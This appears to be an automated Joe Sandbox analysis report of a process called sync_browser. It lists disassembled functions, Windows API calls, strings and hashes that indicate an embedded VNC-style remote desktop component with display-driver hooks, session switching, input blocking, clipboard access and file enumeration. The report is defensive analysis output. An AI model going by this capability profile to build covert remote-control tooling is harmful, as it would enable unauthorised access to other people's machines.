API ID: Window$Item$ProcessText$DialogForeground$CurrentLongMessageThreadsprintf$ActiveBeepDeleteFileFlashImageLoadModuleNameObjectPrivateProfileSendStringTimer
String ID: AutoAccept: %u$AutoAccept:%u$AutoReject: %u$AutoReject:%u$\mylogo.bmp$accept_reject_mesg$admin
API String ID: 384463373-239428621
Opcode ID: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
Instruction ID: f3c6926bccae64b6a146048276d190b0a5f97125c9e3218bcccc158fe38f81ab
Opcode Fuzzy Hash: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
Instruction Fuzzy Hash: 74B1A027E28A4286FB64CB24E8042BAA3A5FFA4755F544131EA5E87794DF3CE54EC700

Function 00007FF67E7D8E10 Relevance: 52.8, APIs: 20, Strings: 10, Instructions: 272registrythreadlibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF67E7D8E5C
GetProcAddress.KERNEL32 ref: 00007FF67E7D8E78
EnumDisplaySettingsA.USER32 ref: 00007FF67E7D8EB5
wprintf.LIBCMT ref: 00007FF67E7D8F68
FreeLibrary.KERNEL32 ref: 00007FF67E7D8F70
wprintf.LIBCMT ref: 00007FF67E7D8FCF
RegCreateKeyA.ADVAPI32 ref: 00007FF67E7D9096
RegCreateKeyA.ADVAPI32 ref: 00007FF67E7D90BA
RegSetValueExA.ADVAPI32 ref: 00007FF67E7D90F6
GetCurrentThreadId.KERNEL32 ref: 00007FF67E7D918E
GetThreadDesktop.USER32 ref: 00007FF67E7D9196
OpenInputDesktop.USER32 ref: 00007FF67E7D91AE
SetThreadDesktop.USER32 ref: 00007FF67E7D91BF
ChangeDisplaySettingsExA.USER32 ref: 00007FF67E7D91DC
ChangeDisplaySettingsExA.USER32 ref: 00007FF67E7D91FE
SetThreadDesktop.USER32 ref: 00007FF67E7D920E
CloseDesktop.USER32 ref: 00007FF67E7D921C
RegCloseKey.ADVAPI32 ref: 00007FF67E7D9227
RegCloseKey.ADVAPI32 ref: 00007FF67E7D9232
FreeLibrary.KERNEL32 ref: 00007FF67E7D923B

Strings

mv2, xrefs: 00007FF67E7D9121
DevNum:%dName:%sString:%sID:%sKey:%s, xrefs: 00007FF67E7D8FC0
mv video hook driver2, xrefs: 00007FF67E7D8F34, 00007FF67E7D8F5A
No '%s' found., xrefs: 00007FF67E7D8F61
EnumDisplayDevicesA, xrefs: 00007FF67E7D8E6E
USER32, xrefs: 00007FF67E7D8E3E
DEVICE0, xrefs: 00007FF67E7D900E
Attach.ToDesktop, xrefs: 00007FF67E7D90D7
SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2, xrefs: 00007FF67E7D9080
\DEVICE, xrefs: 00007FF67E7D8FE0

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseDisplayLibrarySettings$ChangeCreateFreewprintf$AddressCurrentEnumInputLoadOpenProcValue
String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
API String ID: 27940619-3388178877
Opcode ID: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
Instruction ID: 3c43da4b3ffc489f1a8d26ec5595bdcd909a1941a877cacf986ffc28b96320c7
Opcode Fuzzy Hash: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
Instruction Fuzzy Hash: 1FC19137A2868395FB10CF29E8442BA77A5FB64798F544135FA4E8B694EF3CE509C700

Function 00007FF67E7D1D10 Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 209libraryloadersleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7D18A0: GetCurrentProcessId.KERNEL32 ref: 00007FF67E7D18B5
Part of subcall function 00007FF67E7D18A0: OpenProcess.KERNEL32 ref: 00007FF67E7D18C5

Part of subcall function 00007FF67E7D1640: GetVersionExA.KERNEL32 ref: 00007FF67E7D1671
Part of subcall function 00007FF67E7D1640: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7D16B3
Part of subcall function 00007FF67E7D1640: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E7D1767
Part of subcall function 00007FF67E7D1640: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E7D1790
Part of subcall function 00007FF67E7D1640: GetPrivateProfileStringA.KERNEL32 ref: 00007FF67E7D17CE

WTSGetActiveConsoleSessionId.KERNEL32 ref: 00007FF67E7D1D85
CreateEnvironmentBlock.USERENV ref: 00007FF67E7D1DC8
SetLastError.KERNEL32 ref: 00007FF67E7D1DD8
CreateProcessAsUserA.ADVAPI32 ref: 00007FF67E7D1E2B
GetLastError.KERNEL32 ref: 00007FF67E7D1E40
GetLastError.KERNEL32 ref: 00007FF67E7D1E4B
LoadLibraryA.KERNEL32 ref: 00007FF67E7D1E87
LoadLibraryA.KERNEL32 ref: 00007FF67E7D1E97
GetProcAddress.KERNEL32 ref: 00007FF67E7D1EB5
GetProcAddress.KERNEL32 ref: 00007FF67E7D1ECD
Sleep.KERNEL32 ref: 00007FF67E7D1F0B
DestroyEnvironmentBlock.USERENV ref: 00007FF67E7D1F4C
SetLastError.KERNEL32 ref: 00007FF67E7D1F57
CreateProcessAsUserA.ADVAPI32 ref: 00007FF67E7D1FA2
GetLastError.KERNEL32 ref: 00007FF67E7D1FB7
GetLastError.KERNEL32 ref: 00007FF67E7D1FC2
LoadLibraryA.KERNEL32 ref: 00007FF67E7D1FFE
LoadLibraryA.KERNEL32 ref: 00007FF67E7D200E
GetProcAddress.KERNEL32 ref: 00007FF67E7D202C
GetProcAddress.KERNEL32 ref: 00007FF67E7D2044
Sleep.KERNEL32 ref: 00007FF67E7D2082
CloseHandle.KERNEL32 ref: 00007FF67E7D20B3

Strings

LockWorkStation, xrefs: 00007FF67E7D1EC3, 00007FF67E7D203A
winsta.dll, xrefs: 00007FF67E7D1E80, 00007FF67E7D1FF7
h, xrefs: 00007FF67E7D1D62
user32.dll, xrefs: 00007FF67E7D1E8D, 00007FF67E7D2004
Winsta0\Winlogon, xrefs: 00007FF67E7D1D46
WinStationConnectW, xrefs: 00007FF67E7D1EAB, 00007FF67E7D2022

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLast$AddressLibraryLoadProcProcess$CreatePrivateProfile$BlockEnvironmentSleepUser$ActiveCloseConsoleCurrentDestroyFileHandleModuleNameOpenSessionStringVersion
String ID: LockWorkStation$WinStationConnectW$Winsta0\Winlogon$h$user32.dll$winsta.dll
API String ID: 2898369102-3720325205
Opcode ID: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
Instruction ID: 314a80799a93c951bae287f56f8d048844715343a0d4a1fb5a714e6de9478a0c
Opcode Fuzzy Hash: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
Instruction Fuzzy Hash: 7BA1093AA29A8386E760DF25E8502BAA3A4FFA9740F544136F95DC7A54DF3CE44DC700

Function 00007FF67E7C1DD0 Relevance: 45.3, APIs: 30, Instructions: 281clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF67E7C1E04
EmptyClipboard.USER32 ref: 00007FF67E7C1E1B
CloseClipboard.USER32 ref: 00007FF67E7C1E25

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseEmptyOpen
String ID:
API String ID: 1427272684-0
Opcode ID: 50094a2eca30ad614fd31ac1fd7d0e43873141adc59b21ba776c54e127e2d339
Instruction ID: 46aae11ab3baa54999f0d7ed3a161bacb9f64eb9a8661aa52e38dac2dcdfca92
Opcode Fuzzy Hash: 50094a2eca30ad614fd31ac1fd7d0e43873141adc59b21ba776c54e127e2d339
Instruction Fuzzy Hash: FEC16322B19B4296FA10DF65E8541BDA3ADBF69B84F444135EE0E877A5EF3CE448C340

Function 00007FF67E7F3460 Relevance: 44.1, APIs: 13, Strings: 12, Instructions: 369windowclipboardCOMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00007FF67E7F349B
DefWindowProcA.USER32 ref: 00007FF67E7F37AF
GetClipboardOwner.USER32 ref: 00007FF67E7F3809
EnterCriticalSection.KERNEL32 ref: 00007FF67E7F3848
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7F3868
SendNotifyMessageA.USER32 ref: 00007FF67E7F3889
DefWindowProcA.USER32 ref: 00007FF67E7F38E5

Strings

vncdesktopsink.cpp : Monitor22 %i, xrefs: 00007FF67E7F3769
vncdesktopsink.cpp : set hooks OK, xrefs: 00007FF67E7F3A60
vncdesktopsink.cpp : Unsethooks OK, xrefs: 00007FF67E7F3D0C
vncdesktopsink.cpp : Monitor222 %i, xrefs: 00007FF67E7F38A2
vncdesktopsink.cpp : set W8 hooks OK, xrefs: 00007FF67E7F392C
vncdesktopsink.cpp : Unsethooks Failed, xrefs: 00007FF67E7F3D03
vncdesktopsink.cpp : unset W8 hooks OK, xrefs: 00007FF67E7F3C9D
vncdesktopsink.cpp : unset SC hooks OK, xrefs: 00007FF67E7F3CC1
vncdesktopsink.cpp : Power3 %i %i, xrefs: 00007FF67E7F38C2
vncdesktopsink.cpp : failed to set system hooks, xrefs: 00007FF67E7F3A36
vncdesktopsink.cpp : Monitor3 %i %i, xrefs: 00007FF67E7F3789
vncdesktopsink.cpp : set SC hooks OK, xrefs: 00007FF67E7F3965

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Window$CriticalProcSection$ClipboardEnterLeaveLongMessageNotifyOwnerSend
String ID: vncdesktopsink.cpp : Monitor22 %i$vncdesktopsink.cpp : Monitor222 %i$vncdesktopsink.cpp : Monitor3 %i %i$vncdesktopsink.cpp : Power3 %i %i$vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : failed to set system hooks$vncdesktopsink.cpp : set SC hooks OK$vncdesktopsink.cpp : set W8 hooks OK$vncdesktopsink.cpp : set hooks OK$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
API String ID: 378279424-2704384803
Opcode ID: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
Instruction ID: 9e7e4cf4d831e91b5b7a7f452dcdd9817441e7f5c3bc3f2c37553bacf63d7f86
Opcode Fuzzy Hash: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
Instruction Fuzzy Hash: AE028223B286C2A6FB6C9B65C5546F863A4FF60B44F144636EA1E932E0CF3CA45DC700

Function 00007FF67E7EE780 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 204libraryloadertimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E8792A4: malloc.LIBCMT ref: 00007FF67E8792C7

CreateRectRgn.GDI32 ref: 00007FF67E7EE810
InitializeCriticalSection.KERNEL32 ref: 00007FF67E7EE85C
InitializeCriticalSection.KERNEL32 ref: 00007FF67E7EE886
CreateRectRgn.GDI32 ref: 00007FF67E7EE8AA
timeGetTime.WINMM ref: 00007FF67E7EE9B9
LoadLibraryA.KERNEL32 ref: 00007FF67E7EE9F4
GetProcAddress.KERNEL32 ref: 00007FF67E7EEA10
CreateEventA.KERNEL32 ref: 00007FF67E7EEA62
CreateEventA.KERNEL32 ref: 00007FF67E7EEA7F
CreateEventA.KERNEL32 ref: 00007FF67E7EEA9C
CreateEventA.KERNEL32 ref: 00007FF67E7EEAB9
CreateEventA.KERNEL32 ref: 00007FF67E7EEAD6
CreateEventA.KERNEL32 ref: 00007FF67E7EEAF3
CreateEventA.KERNEL32 ref: 00007FF67E7EEB11
SetRectRgn.GDI32 ref: 00007FF67E7EEB31
SetRectRgn.GDI32 ref: 00007FF67E7EEB77

Strings

user2, xrefs: 00007FF67E7EEAC6
screenupdate, xrefs: 00007FF67E7EEA6F
quit, xrefs: 00007FF67E7EEAE3
timer, xrefs: 00007FF67E7EEA52
USER32, xrefs: 00007FF67E7EE9ED
user1, xrefs: 00007FF67E7EEAA9
BlockInput, xrefs: 00007FF67E7EEA06
mouseupdate, xrefs: 00007FF67E7EEA8C
restart, xrefs: 00007FF67E7EEB00

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Create$Event$Rect$CriticalInitializeSection$AddressLibraryLoadProcTimemalloctime
String ID: BlockInput$USER32$mouseupdate$quit$restart$screenupdate$timer$user1$user2
API String ID: 33112563-1779637096
Opcode ID: 1be1030451942fc1503267f534b42bd66129e4ea34a4f6e245b6222fff45b2b0
Instruction ID: 5463c944b6031ebfe9863b25309f118fb30d65d8f08398b20b4584570ada30ea
Opcode Fuzzy Hash: 1be1030451942fc1503267f534b42bd66129e4ea34a4f6e245b6222fff45b2b0
Instruction Fuzzy Hash: 4BB12733918BC18AE328CF78F84469AB7A8FB14B04F94492AD7EA46250DF7DF059C754

Function 00007FF67E7F54A0 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 301COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67E7F5502
GetRegionData.GDI32 ref: 00007FF67E7F5632
GetRegionData.GDI32 ref: 00007FF67E7F5655
CreateRectRgn.GDI32 ref: 00007FF67E7F5691
GetRegionData.GDI32 ref: 00007FF67E7F56B9
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7F5902

Strings

F, xrefs: 00007FF67E7F54F7

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: DataRegion$CriticalSection$CreateEnterLeaveRect
String ID: F
API String ID: 2411647221-1304234792
Opcode ID: c1a9219981f70a567aa0cdfc7355be092d3ec4ad7157660908e4aed3f1e61130
Instruction ID: dfad077d564a492ce5675c3f842f70d932e88c200ab987e0c14da0efa80b4c95
Opcode Fuzzy Hash: c1a9219981f70a567aa0cdfc7355be092d3ec4ad7157660908e4aed3f1e61130
Instruction Fuzzy Hash: A6C1D233B28A8186E710DB6AE4447A9B7A1FB98F94F544031EE5E83755DF3DD849CB00

Function 00007FF67E7C3770 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 192timewindowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF67E7C3785
CreateCompatibleDC.GDI32 ref: 00007FF67E7C37A2
CreateCompatibleBitmap.GDI32 ref: 00007FF67E7C37C7
GetDIBits.GDI32 ref: 00007FF67E7C382B
GetDIBits.GDI32 ref: 00007FF67E7C3856
GetDeviceCaps.GDI32 ref: 00007FF67E7C3876
GetDeviceCaps.GDI32 ref: 00007FF67E7C3887
GetDeviceCaps.GDI32 ref: 00007FF67E7C38D2
CreateDIBSection.GDI32 ref: 00007FF67E7C3901
CreateCompatibleBitmap.GDI32 ref: 00007FF67E7C3920
DeleteObject.GDI32 ref: 00007FF67E7C393A
timeGetTime.WINMM ref: 00007FF67E7C3940
SelectObject.GDI32 ref: 00007FF67E7C394F
BitBlt.GDI32 ref: 00007FF67E7C3988
SelectObject.GDI32 ref: 00007FF67E7C3994
timeGetTime.WINMM ref: 00007FF67E7C399A
timeGetTime.WINMM ref: 00007FF67E7C39A6
GetPixel.GDI32 ref: 00007FF67E7C39EB
timeGetTime.WINMM ref: 00007FF67E7C39F6
ReleaseDC.USER32 ref: 00007FF67E7C3A3C
DeleteDC.GDI32 ref: 00007FF67E7C3A45
DeleteObject.GDI32 ref: 00007FF67E7C3A53

Strings

benchmark.cpp : Blit time %i Getpixeltime %i Use getpixel= %i, xrefs: 00007FF67E7C39FC
, xrefs: 00007FF67E7C3961

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateObjectTimetime$CapsCompatibleDeleteDevice$BitmapBitsSelect$PixelReleaseSection
String ID: $benchmark.cpp : Blit time %i Getpixeltime %i Use getpixel= %i
API String ID: 2697070071-1399849103
Opcode ID: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
Instruction ID: 90733297c5dd59d6e0b3e4f98ca3396430596b643ce466c726337d049b598a66
Opcode Fuzzy Hash: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
Instruction Fuzzy Hash: 63816477A28A4286EB54CF25A80466AB7A9FB98B85F445135FD4E87B64DF3CE00DC700

Function 00007FF67E7E6DD1 Relevance: 40.8, APIs: 15, Strings: 8, Instructions: 552filestringCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF67E7E407F
CloseDesktop.USER32 ref: 00007FF67E7E40C2
GetLogicalDriveStringsA.KERNEL32 ref: 00007FF67E7E6DF7
GetDriveTypeA.KERNEL32 ref: 00007FF67E7E6E64
SHGetMalloc.SHELL32 ref: 00007FF67E7E705C
SHGetSpecialFolderLocation.SHELL32 ref: 00007FF67E7E7072
SHGetPathFromIDListA.SHELL32 ref: 00007FF67E7E7087
SetErrorMode.KERNEL32 ref: 00007FF67E7E7131
FindFirstFileA.KERNEL32 ref: 00007FF67E7E7147
SetErrorMode.KERNEL32 ref: 00007FF67E7E7152
lstrlenA.KERNEL32 ref: 00007FF67E7E7288
FindNextFileA.KERNEL32 ref: 00007FF67E7E7346
FindClose.KERNEL32 ref: 00007FF67E7E735A
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7E7BAC

Strings

vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF67E7E409A
Desktop, xrefs: 00007FF67E7E7011
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF67E7E4060
My Documents, xrefs: 00007FF67E7E6FED
vncservice.cpp : SelectDesktop , xrefs: 00007FF67E7E404B
Network Favorites, xrefs: 00007FF67E7E7030
vncclient.cpp : vncClientThread , xrefs: 00007FF67E7E4029
f, xrefs: 00007FF67E7E6E99

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Find$CloseDesktopDriveErrorFileMode$CriticalFirstFolderFromInputLeaveListLocationLogicalMallocNextOpenPathSectionSpecialStringsTypelstrlen
String ID: Desktop$My Documents$Network Favorites$f$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2965397059-206656798
Opcode ID: 97da4ef10995c7672ad6912daa4e382a39bd3aa79c8f896b0fc3866ca369b3f8
Instruction ID: b413db0da94784da844039f6278749e3114fcd4cbfa1ae4ffaf571db49454362
Opcode Fuzzy Hash: 97da4ef10995c7672ad6912daa4e382a39bd3aa79c8f896b0fc3866ca369b3f8
Instruction Fuzzy Hash: 0D42C623A28A8285FB60CB35C8483FD27A5FBA4798F544235EA1D8B6D5DF3CE549C300

Function 00007FF67E7D1100 Relevance: 40.6, APIs: 19, Strings: 4, Instructions: 331filesleeplibraryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF67E7D119C
GetLastError.KERNEL32 ref: 00007FF67E7D11A6
GetSystemDirectoryW.KERNEL32 ref: 00007FF67E7D121F
lstrcatW.KERNEL32 ref: 00007FF67E7D1233
LoadLibraryW.KERNEL32 ref: 00007FF67E7D1240
GetProcAddress.KERNEL32 ref: 00007FF67E7D1258
FreeLibrary.KERNEL32 ref: 00007FF67E7D1290
sprintf_s.LIBCMTD ref: 00007FF67E7D12BA
